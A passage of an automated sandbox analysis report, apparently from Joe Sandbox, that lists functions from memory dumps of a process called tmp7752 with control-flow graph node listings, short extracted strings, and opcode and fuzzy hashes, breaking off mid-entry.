                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$DYh
                                                                                            • API String ID: 0-1359653725
                                                                                            • Opcode ID: d4821b1deb91625fc9ed6a4497782e8f9f13a41e4ba7e1f59a1a829456d3ea10
                                                                                            • Instruction ID: 07da43915f486f85e28c17133bf724b98e12a6103cb8dd66c0f54e6af4b46143
                                                                                            • Opcode Fuzzy Hash: d4821b1deb91625fc9ed6a4497782e8f9f13a41e4ba7e1f59a1a829456d3ea10
                                                                                            • Instruction Fuzzy Hash: 35427874B047169FCB15CF69C89466FBBF2FB89300F24852AE56AD7390DB34A901CB90
                                                                                            Function 00A919A3 Relevance: 3.0, Strings: 2, Instructions: 539COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2222 a919a3-a91a4b 2229 a91a51-a91b14 2222->2229 2230 a91b23-a91b6b 2222->2230 2229->2230 2260 a91b16-a91b20 2229->2260 2235 a91d0c-a91dc0 2230->2235 2236 a91b71-a91bb3 2230->2236 2265 a91e7f-a91eb9 2235->2265 2266 a91dc6-a91e7d 2235->2266 2244 a91cf1-a91d00 2236->2244 2246 a91bd0-a91bdf 2244->2246 2247 a91d06-a91d07 2244->2247 2250 a91be1 2246->2250 2251 a91be6-a91c58 2246->2251 2248 a9208f-a920e4 2247->2248 2268 a9237d-a923ab 2248->2268 2250->2251 2262 a91c5a 2251->2262 2263 a91c5f-a91ce6 2251->2263 2260->2230 2262->2263 2309 a91ce8 2263->2309 2310 a91ceb 2263->2310 2278 a91ec0-a91ec9 2265->2278 2266->2278 2275 a920e9-a9212a 2268->2275 2276 a923b1-a923d2 2268->2276 2284 a9212c 2275->2284 2285 a92133-a92134 2275->2285 2347 a923d8 call a955c9 2276->2347 2348 a923d8 call a955d8 2276->2348 2282 a9207a-a92089 2278->2282 2282->2248 2287 a91ece-a91edd 2282->2287 2284->2285 2290 a92139-a9214b 2284->2290 2291 a922ca-a9230f 2284->2291 2292 a9215e-a921ae 2284->2292 2293 a92311-a92323 2284->2293 2294 a92280-a922c5 2284->2294 2295 a921b3-a92211 2284->2295 2296 a92333-a9236c 2284->2296 2297 a92216-a9227b 2284->2297 2286 a92377 2285->2286 2286->2268 2303 a91edf 2287->2303 2304 a91ee4-a91f65 2287->2304 2289 a923de-a9241a call 503deb8 2325 a92420 2289->2325 2298 a9214d 2290->2298 2299 a92152-a92159 2290->2299 2291->2286 2292->2286 2300 a9232a-a92331 2293->2300 2301 a92325 2293->2301 2294->2286 2295->2286 2296->2286 2297->2286 2298->2299 2299->2286 2300->2286 2301->2300 2303->2304 2334 a91f6b-a91f96 2304->2334 2335 a91ff4-a9201f 2304->2335 2309->2310 2310->2244 2336 a91f98 2334->2336 2337 a91f9d-a91fef 2334->2337 2338 a92021 2335->2338 2339 a92026-a92069 2335->2339 2336->2337 2345 a92074 2337->2345 2338->2339 2339->2345 2345->2282 2347->2289 2348->2289
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `{,$`{,
                                                                                            • API String ID: 0-3935998731
                                                                                            • Opcode ID: cf88988ecee9a16beffdd517138cfc209c041839bddd4e1c98d75eb45c93c524
                                                                                            • Instruction ID: 7f387e7d1657c39f7289b175f1221ef4f8d1463f1be9e903e7c31db143d80746
                                                                                            • Opcode Fuzzy Hash: cf88988ecee9a16beffdd517138cfc209c041839bddd4e1c98d75eb45c93c524
                                                                                            • Instruction Fuzzy Hash: 0A52B274A046288FCB64DF28DD84B9AB7B2FB89301F1085E9D90DA7355DB34AE81CF54
                                                                                            Function 00AACC20 Relevance: .3, Instructions: 319COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 385f3625ba4a2de0163fa21390c3a82cded36970f0f5c0d6422c4fd3fb016197
                                                                                            • Instruction ID: 5ccfcabc818176409709957d24edb441b2dee3cd2dc57cd13c68ee2c33de40f4
                                                                                            • Opcode Fuzzy Hash: 385f3625ba4a2de0163fa21390c3a82cded36970f0f5c0d6422c4fd3fb016197
                                                                                            • Instruction Fuzzy Hash: 90D11A74E05218CFEB24DF69D844BADBBF2FB8A314F2080A9D409A7795DB745985CF01
                                                                                            Function 00D28D48 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 85741e418e1ff8b046355f02f95f3079696a9588f8a29bbe9f7ebed8099ffdfb
                                                                                            • Instruction ID: 82d8f9e6e9ea414f85a25418070b5d62461504e609e94431d17cf42421b92136
                                                                                            • Opcode Fuzzy Hash: 85741e418e1ff8b046355f02f95f3079696a9588f8a29bbe9f7ebed8099ffdfb
                                                                                            • Instruction Fuzzy Hash: 10B14770E05228CFDB24CFAAE954B9DB7F2BBA9304F2080A9D408A7355DB759D85DF10
                                                                                            Function 00D28D40 Relevance: .3, Instructions: 261COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70104616925d2e6a944144005fa72bd08e1752571096452b292e913f32f77aed
                                                                                            • Instruction ID: 27439df5959cb72f1c7782fe0e7e42234ab8d8a85fa3b6f4ea9f9d89ab57ccb5
                                                                                            • Opcode Fuzzy Hash: 70104616925d2e6a944144005fa72bd08e1752571096452b292e913f32f77aed
                                                                                            • Instruction Fuzzy Hash: B7B14574E05228CFDB24CFAAE954B9DB7F2BBA9304F2080A9D408A7355DB759D85CF10
                                                                                            Function 00A9D500 Relevance: .2, Instructions: 247COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 23f1614ccba0b5c365f5f87e858278dd19a1a630aa506f82e8d5c50f81bcefe3
                                                                                            • Instruction ID: 5cc8a87e63a0dad9f4fbab5052a152e5d7f22d6e0871a8a742b636a261047184
                                                                                            • Opcode Fuzzy Hash: 23f1614ccba0b5c365f5f87e858278dd19a1a630aa506f82e8d5c50f81bcefe3
                                                                                            • Instruction Fuzzy Hash: BEB1F474E15218CFDF24DFAAD984B9DBBF2BF8A304F2080A9D509AB255DB745985CF00
                                                                                            Function 00A9C858 Relevance: .2, Instructions: 209COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8f51ac5ae4d28ca05f9e2d729414004693d17bd712fefc21e74915df50717de1
                                                                                            • Instruction ID: 4e561fb5324ac9f6a3a25b27a3da4a9285ad02755eff98fbec127dd2f7031bcc
                                                                                            • Opcode Fuzzy Hash: 8f51ac5ae4d28ca05f9e2d729414004693d17bd712fefc21e74915df50717de1
                                                                                            • Instruction Fuzzy Hash: 9A911570E05A18CFEF24CF6AD855BADBBF2BB4A324F2080A9D009A7651DB755D84CF40
                                                                                            Function 00648250 Relevance: .2, Instructions: 209COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 12dcc963b79fcefa2e090d4b9dd1d152a7ea2d9fd2bd2fd1bf4d1adcc5bc09ab
                                                                                            • Instruction ID: d56b31d221455173354bbd69a883f5b382acecc86f5effc6c397ea9923a10a16
                                                                                            • Opcode Fuzzy Hash: 12dcc963b79fcefa2e090d4b9dd1d152a7ea2d9fd2bd2fd1bf4d1adcc5bc09ab
                                                                                            • Instruction Fuzzy Hash: 44913674D05618CFDB64DFA9D894BEDBBF2BB8A300F10816AD008A7355EB795986CF40
                                                                                            Function 0020ECA8 Relevance: .2, Instructions: 208COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1c82ea85ad75f37de6d16f1f5fdd6a15790103ea661cd1daf7335a680e35390
                                                                                            • Instruction ID: 2864d4438f4f45fe519403b07de1b239941ef8441d88987841a784f097ef1631
                                                                                            • Opcode Fuzzy Hash: c1c82ea85ad75f37de6d16f1f5fdd6a15790103ea661cd1daf7335a680e35390
                                                                                            • Instruction Fuzzy Hash: 64815B35A10219CFDB14DFA9C488A9DB7F5FF48311B1685A9E816DB3A1DB30EC81CB90
                                                                                            Function 00208A00 Relevance: .2, Instructions: 170COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e8a53730602c8a096e5bc432cec3dfb986cfca7fb5932e09b19c0ed99d553d58
                                                                                            • Instruction ID: 0646d1c1298459c744f33e7fb06efa3ae69ff4ddc06c13a8809d1338d29e5851
                                                                                            • Opcode Fuzzy Hash: e8a53730602c8a096e5bc432cec3dfb986cfca7fb5932e09b19c0ed99d553d58
                                                                                            • Instruction Fuzzy Hash: 8A711AB1E04A498FD708EFAAE85169EBBF2BF98300F04C5B9D4149B268DF745946CF50
                                                                                            Function 00208A10 Relevance: .2, Instructions: 165COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 427876b26df7e145117476d4e8fcb02ff17d77596ba98392e10b0ef0dd75671e
                                                                                            • Instruction ID: 16829a2fbc1fd52b4922eafb7a96a1f827921b5abcd7768dfc079e802f819a6e
                                                                                            • Opcode Fuzzy Hash: 427876b26df7e145117476d4e8fcb02ff17d77596ba98392e10b0ef0dd75671e
                                                                                            • Instruction Fuzzy Hash: AD710BB1E00A098FD748EFAAE85168EBBF6FB98300F14C5B9D4149B268DF745946CF50
                                                                                            Function 00A90006 Relevance: .2, Instructions: 153COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 19cd8e8a2c84573266d667b31203d9c7d903e301ec5f4f52582aaca8968e70db
                                                                                            • Instruction ID: 31bbcc3e4c369c4e578de7b127f61de67effb7eb7b416c38a76b1f6f21676ab5
                                                                                            • Opcode Fuzzy Hash: 19cd8e8a2c84573266d667b31203d9c7d903e301ec5f4f52582aaca8968e70db
                                                                                            • Instruction Fuzzy Hash: 0B611A71E05A588FEB19CF6BDC5469ABBF3AFC9301F14C1AAC408AB255DB744981CF40
                                                                                            Function 00D2F1E0 Relevance: 6.8, Strings: 5, Instructions: 534COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 226 d2f1e0-d2f203 227 d2f212-d2f21b 226->227 228 d2f205-d2f210 226->228 228->227 229 d2f21e-d2f252 call d2f958 228->229 232 d2f2a3-d2f2ca call d2e2e0 229->232 233 d2f254-d2f26c call d2ada8 229->233 239 d2f2d0 232->239 240 d2f4cf-d2f4e1 call d2ed20 232->240 233->232 238 d2f26e-d2f299 call d2db48 233->238 238->232 248 d2f29b-d2f2a0 238->248 245 d2f2d9-d2f2e1 239->245 246 d2f4e3-d2f4fb 240->246 247 d2f500-d2f506 240->247 249 d2f2e3 245->249 250 d2f2ea-d2f2ed 245->250 246->247 275 d2f4fd 246->275 251 d2f515-d2f55f call 20e3d8 247->251 252 d2f508-d2f50f 247->252 248->232 249->250 253 d2f452-d2f46e 249->253 254 d2f370-d2f383 249->254 255 d2f3d1-d2f3e4 249->255 256 d2f43a-d2f44d 249->256 257 d2f3b8-d2f3cc 249->257 258 d2f358-d2f36b 249->258 259 d2f318-d2f353 249->259 260 d2f39f-d2f3b3 249->260 261 d2f301-d2f313 249->261 262 d2f421-d2f435 249->262 263 d2f40a-d2f41c 249->263 264 d2f388-d2f39a 249->264 265 d2f3e9-d2f405 249->265 266 d2f2f3-d2f2f6 250->266 267 d2f470-d2f4a1 250->267 292 d2f565 251->292 252->251 269 d2f511-d2f513 252->269 253->240 254->240 255->240 256->240 257->240 258->240 259->240 260->240 261->240 262->240 263->240 264->240 265->240 270 d2f4a3-d2f4cd 266->270 271 d2f2fc 266->271 267->240 277 d2f567-d2f569 269->277 270->240 271->240 275->247 290 d2f56f-d2f578 277->290 291 d2f88d-d2f896 277->291 293 d2f58a-d2f5ca call d2e4a0 290->293 294 d2f57a-d2f582 290->294 292->277 303 d2f5de 293->303 304 d2f5cc-d2f5dc 293->304 294->293 305 d2f5e0-d2f5e2 303->305 304->303 304->305 307 d2f601-d2f630 305->307 308 d2f5e4-d2f5ff 305->308 313 d2f66d-d2f675 307->313 317 d2f632-d2f65e 307->317 308->313 315 d2f683 313->315 316 d2f677-d2f681 313->316 318 d2f688-d2f68a 315->318 316->318 317->313 327 d2f660-d2f664 317->327 319 d2f69a-d2f70c 318->319 320 d2f68c-d2f692 318->320 328 d2f730-d2f756 319->328 329 d2f70e-d2f725 319->329 320->319 327->313 331 d2f758-d2f765 call 20eca8 328->331 332 d2f76d 328->332 329->328 334 d2f76b 331->334 333 d2f76f-d2f78e 332->333 333->291 336 d2f794-d2f7a6 call d2ed20 333->336 334->333 336->291 339 d2f7ac-d2f7c4 336->339 341 d2f7c6-d2f7cf 339->341 342 d2f7fd-d2f815 339->342 343 d2f7d1-d2f7d4 341->343 344 d2f7de-d2f7e5 341->344 347 d2f817-d2f820 342->347 348 d2f845-d2f85d 342->348 343->344 344->342 346 d2f7e7-d2f7f8 344->346 346->291 349 d2f822-d2f825 347->349 350 d2f82f-d2f838 347->350 348->291 354 d2f85f-d2f868 348->354 349->350 350->348 352 d2f83a-d2f842 350->352 352->348 356 d2f877-d2f880 354->356 357 d2f86a-d2f86d 354->357 356->291 358 d2f882-d2f88a 356->358 357->356 358->291
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8`h$Oh$Oh$Oh$Oh
                                                                                            • API String ID: 0-2290478276
                                                                                            • Opcode ID: a5ab3d00c4f6e03359f71b715bf57dfcf26c398c504621b6b3b54976036d54b3
                                                                                            • Instruction ID: e3733c42df767403602915a8e2e564dde61acce5970197e9485ab373ec06a265
                                                                                            • Opcode Fuzzy Hash: a5ab3d00c4f6e03359f71b715bf57dfcf26c398c504621b6b3b54976036d54b3
                                                                                            • Instruction Fuzzy Hash: 14228D35A002249FCB04DFA4E490A6DB7B2EF98314F148979E905EB3A5DB75ED41CBA0
                                                                                            Function 0020E3D8 Relevance: 6.6, Strings: 5, Instructions: 354COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 363 20e3d8-20e400 365 20e406-20e40a 363->365 366 20e4ec-20e511 363->366 367 20e40c-20e418 365->367 368 20e41e-20e422 365->368 373 20e518-20e53c 366->373 367->368 367->373 369 20e543-20e568 368->369 370 20e428-20e43f 368->370 391 20e56f-20e59f 369->391 381 20e441-20e44d 370->381 382 20e453-20e457 370->382 373->369 381->382 381->391 384 20e483-20e49c 382->384 385 20e459-20e472 call 2001b0 382->385 397 20e4c5-20e4e9 384->397 398 20e49e-20e4c2 384->398 385->384 396 20e474-20e477 385->396 406 20e5a1-20e5a9 391->406 400 20e480 396->400 400->384 407 20e612-20e614 406->407 408 20e5ab-20e5c2 406->408 407->406 409 20e615-20e61c 407->409 410 20e5c4-20e5e4 408->410 411 20e5fa-20e60b 408->411 415 20e650-20e651 409->415 416 20e61e 409->416 422 20e626-20e64b 410->422 425 20e5e6-20e5f7 410->425 411->407 417 20e652-20e67a 415->417 418 20e61f-20e620 415->418 416->408 416->418 420 20e680-20e68c 417->420 421 20e721-20e76f 417->421 418->422 427 20e696-20e6aa 420->427 428 20e68e-20e695 420->428 440 20e771-20e795 421->440 441 20e79f-20e7a5 421->441 422->415 435 20e719-20e720 427->435 436 20e6ac-20e6d1 427->436 447 20e6d3-20e6ed 436->447 448 20e714-20e717 436->448 440->441 442 20e797 440->442 443 20e7b7-20e7c6 441->443 444 20e7a7-20e7b4 441->444 442->441 447->448 450 20e6ef-20e6f8 447->450 448->435 448->436 451 20e707-20e713 450->451 452 20e6fa-20e6fd 450->452 452->451
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$(!p$(!p$(!p$(!p
                                                                                            • API String ID: 0-3955841951
                                                                                            • Opcode ID: 35d4d8b89f23bd024ed1c0e8248832d5aeea9c8e022dc40e2af6439633b90779
                                                                                            • Instruction ID: 04c1b015bfcb79ae9855600504a2aa558562b52f05c676055f1960dae964edf2
                                                                                            • Opcode Fuzzy Hash: 35d4d8b89f23bd024ed1c0e8248832d5aeea9c8e022dc40e2af6439633b90779
                                                                                            • Instruction Fuzzy Hash: D8C124363143514FDB14DF68D850A6E7BA6EF84310B2945AAF909CB3E6CB34DC5287A1
                                                                                            Function 00D2261E Relevance: 3.8, Strings: 3, Instructions: 51COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2046 d2261e-d22623 call d241a5 2049 d22629-d22634 2046->2049 2050 d2433e-d24354 2046->2050 2051 d2014a-d20155 2049->2051 2055 d2435c-d24405 2050->2055 2053 d20157-d2413d 2051->2053 2054 d2015e-d20e70 2051->2054 2053->2051 2064 d24143-d2414e 2053->2064 2058 d20e72 2054->2058 2059 d20e77-d20e85 2054->2059 2055->2051 2069 d2440b-d24416 2055->2069 2058->2059 2059->2051 2064->2051 2069->2051
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0,$"$(
                                                                                            • API String ID: 0-2187247857
                                                                                            • Opcode ID: c03d5e03747c25b83dd9b74aeb69de6fd8857f0cb94469477bd0478a16f33375
                                                                                            • Instruction ID: 01e31faa8ff2af66d59d20dad593d0c8beaf520815b97669d6a6cb9c85cee55a
                                                                                            • Opcode Fuzzy Hash: c03d5e03747c25b83dd9b74aeb69de6fd8857f0cb94469477bd0478a16f33375
                                                                                            • Instruction Fuzzy Hash: A921A574A012288FDB65DF28E859BDABBF1BF5A304F5041E9D50EA7260DB305E90CF51
                                                                                            Function 00A92F18 Relevance: 3.8, Strings: 3, Instructions: 25COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2070 a92f18-a92f38 2072 a92f3a 2070->2072 2073 a92f3f-a92f44 2070->2073 2072->2073 2075 a92f4e-a92f56 call 20cad8 2073->2075 2076 a92f5b-a92f5f 2075->2076
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O$O$,
                                                                                            • API String ID: 0-3239620795
                                                                                            • Opcode ID: 6aaeae97cd83c21980968e7a1fca6cfe8866ba2df6821e0d67c56c0c1d4aeaaa
                                                                                            • Instruction ID: 67d9262ccabc8419ae3a5aadcaac89115ec9894ed41979f9044a5dd59d4f50d9
                                                                                            • Opcode Fuzzy Hash: 6aaeae97cd83c21980968e7a1fca6cfe8866ba2df6821e0d67c56c0c1d4aeaaa
                                                                                            • Instruction Fuzzy Hash: 9AE0D87190524CAFD700EBB08921B5E37A4DB02300F1001F5D808D7291EE351E248B96
                                                                                            Function 0020FAC8 Relevance: 2.8, Strings: 2, Instructions: 345COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2459 20fac8-20fada 2460 20fb04-20fb08 2459->2460 2461 20fadc-20fafd 2459->2461 2462 20fb14-20fb23 2460->2462 2463 20fb0a-20fb0c 2460->2463 2461->2460 2464 20fb25 2462->2464 2465 20fb2f-20fb5b 2462->2465 2463->2462 2464->2465 2469 20fb61-20fb67 2465->2469 2470 20fd88-20fdcf 2465->2470 2472 20fc39-20fc3d 2469->2472 2473 20fb6d-20fb73 2469->2473 2501 20fdd1 2470->2501 2502 20fde5-20fdf1 2470->2502 2475 20fc60-20fc69 2472->2475 2476 20fc3f-20fc48 2472->2476 2473->2470 2474 20fb79-20fb86 2473->2474 2478 20fc18-20fc21 2474->2478 2479 20fb8c-20fb95 2474->2479 2481 20fc6b-20fc8b 2475->2481 2482 20fc8e-20fc91 2475->2482 2476->2470 2480 20fc4e-20fc5e 2476->2480 2478->2470 2483 20fc27-20fc33 2478->2483 2479->2470 2484 20fb9b-20fbb3 2479->2484 2485 20fc94-20fc9a 2480->2485 2481->2482 2482->2485 2483->2472 2483->2473 2487 20fbb5 2484->2487 2488 20fbbf-20fbd1 2484->2488 2485->2470 2490 20fca0-20fcb3 2485->2490 2487->2488 2488->2478 2496 20fbd3-20fbd9 2488->2496 2490->2470 2492 20fcb9-20fcc9 2490->2492 2492->2470 2495 20fccf-20fcdc 2492->2495 2495->2470 2498 20fce2-20fcf7 2495->2498 2499 20fbe5-20fbeb 2496->2499 2500 20fbdb 2496->2500 2498->2470 2510 20fcfd-20fd20 2498->2510 2499->2470 2506 20fbf1-20fc15 2499->2506 2500->2499 2507 20fdd4-20fdd6 2501->2507 2504 20fdf3 2502->2504 2505 20fdfd-20fe19 2502->2505 2504->2505 2508 20fdd8-20fde3 2507->2508 2509 20fe1a-20fe47 2507->2509 2508->2502 2508->2507 2520 20fe49-20fe4f 2509->2520 2521 20fe5f-20fe61 2509->2521 2510->2470 2515 20fd22-20fd2d 2510->2515 2517 20fd7e-20fd85 2515->2517 2518 20fd2f-20fd39 2515->2518 2518->2517 2526 20fd3b-20fd51 2518->2526 2523 20fe51 2520->2523 2524 20fe53-20fe55 2520->2524 2525 20fe69-20fe6d 2521->2525 2523->2521 2524->2521 2527 20feb8-20fec8 2525->2527 2528 20fe6f-20fe86 2525->2528 2532 20fd53 2526->2532 2533 20fd5d-20fd76 2526->2533 2528->2527 2536 20fe88-20fe92 2528->2536 2532->2533 2533->2517 2539 20fe94-20fea3 2536->2539 2540 20fea5-20feb5 2536->2540 2539->2540
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$d
                                                                                            • API String ID: 0-1322973597
                                                                                            • Opcode ID: e1db09f0f2fdacad9378a14b0a936369b9dae790b3e72a37045259ffa841d545
                                                                                            • Instruction ID: fc02acae31588ce5fd775406a598ae7164a3ce63ca9a2927bb9add1a43b50863
                                                                                            • Opcode Fuzzy Hash: e1db09f0f2fdacad9378a14b0a936369b9dae790b3e72a37045259ffa841d545
                                                                                            • Instruction Fuzzy Hash: 82D16A35600706CFC724CF28C584A6AB7F2FF89310B558969D45A9BBA2DB30FC56CB90
                                                                                            Function 00D2D948 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$H!p
                                                                                            • API String ID: 0-1960402415
                                                                                            • Opcode ID: cae131debbf6024281174e817fd1432e740c6f4daa07e77ab6fa44c96739e1c4
                                                                                            • Instruction ID: 80741d84002919040686a96e4fc063a92ca6f9a5a5a4b5a33413da3e5e2fe412
                                                                                            • Opcode Fuzzy Hash: cae131debbf6024281174e817fd1432e740c6f4daa07e77ab6fa44c96739e1c4
                                                                                            • Instruction Fuzzy Hash: 2751AA347002108FD719AF34E865A2E77A3EF99304B254669E506DB3A5CF35EC02CBA5
                                                                                            Function 00A96992 Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ^$^
                                                                                            • API String ID: 0-3830990845
                                                                                            • Opcode ID: c6085d80f0b6c1d82e975a36b3de4ff0bb1e0506464dcd15fde1ffce90774586
                                                                                            • Instruction ID: 4cdbe4016e0ecdb04dba7047aa257f17633629a73b0074f8e866c2a8f6b441e4
                                                                                            • Opcode Fuzzy Hash: c6085d80f0b6c1d82e975a36b3de4ff0bb1e0506464dcd15fde1ffce90774586
                                                                                            • Instruction Fuzzy Hash: 9441CF74A01668CFDF21EFA0C988BDDBBF1BB59301F2081A9D409AB394DB745A85CF54
                                                                                            Function 05020347 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
